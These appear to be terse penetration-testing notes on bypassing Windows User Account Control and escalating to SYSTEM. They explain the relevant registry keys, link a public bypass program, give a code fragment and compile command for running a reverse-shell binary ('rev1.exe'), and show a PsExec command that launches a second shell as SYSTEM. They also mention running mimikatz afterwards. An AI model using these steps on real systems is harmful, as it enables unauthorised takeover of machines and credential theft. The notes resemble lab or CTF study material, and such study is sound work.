EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys
ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but from configuring the UAC slider in Windows settings it takes on either 0, 2 or 5.
PromptOnSecureDesktop is binary, either 0 or 1.
When 2. & 3. is default or lower ( not work when ConsentPromptBehaviorAdmin = 2 and PromptOnSecureDesktop = 1)
https://github.com/turbo/zero2hero/raw/master/main.c
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\rev1.exe");
x86_64-w64-mingw32-gcc main.c -o 64.exe
64.exe -c rev1.exe
>>can use mimi alrdy
PSexec with high integrity shell to system
PsExec64.exe -accepteula -d -s C:\rev2.exe
